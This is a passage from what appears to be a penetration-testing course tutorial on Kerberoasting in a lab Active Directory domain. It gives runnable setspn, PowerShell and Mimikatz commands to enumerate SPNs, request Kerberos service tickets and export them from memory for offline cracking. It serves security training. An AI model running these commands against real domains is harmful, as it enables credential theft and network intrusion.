Semi Manual method

Let's begin with the built-in setspn binary to enumerate SPNs in the domain.

setspn.exe

setspn.exe -Q */*

Using PowerShell, we can request TGS tickets for an account in the shell above and load them into memory. Once they are loaded into memory, we can extract them using Mimikatz. Let's try this by targeting a single user:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Let's break down the commands above to see what we are doing (which is essentially what is used by Rubeus when using the default Kerberoasting method):

• The Add-Type cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object
• The AssemblyName parameter allows us to specify an assembly that contains types that we are interested in using
• System.IdentityModel is a namespace that contains different classes for building security token services
• We'll then use the New-Object cmdlet to create an instance of a .NET Framework object
• We'll use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session

We can also choose to retrieve all tickets using the same method, but this will also pull all computer accounts, so it is not optimal.

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

base64 /out:true
kerberos::list /export

<base64 blob output>

If we do not specify the base64 /out:true command, Mimikatz will extract the tickets and write them to .kirbi files.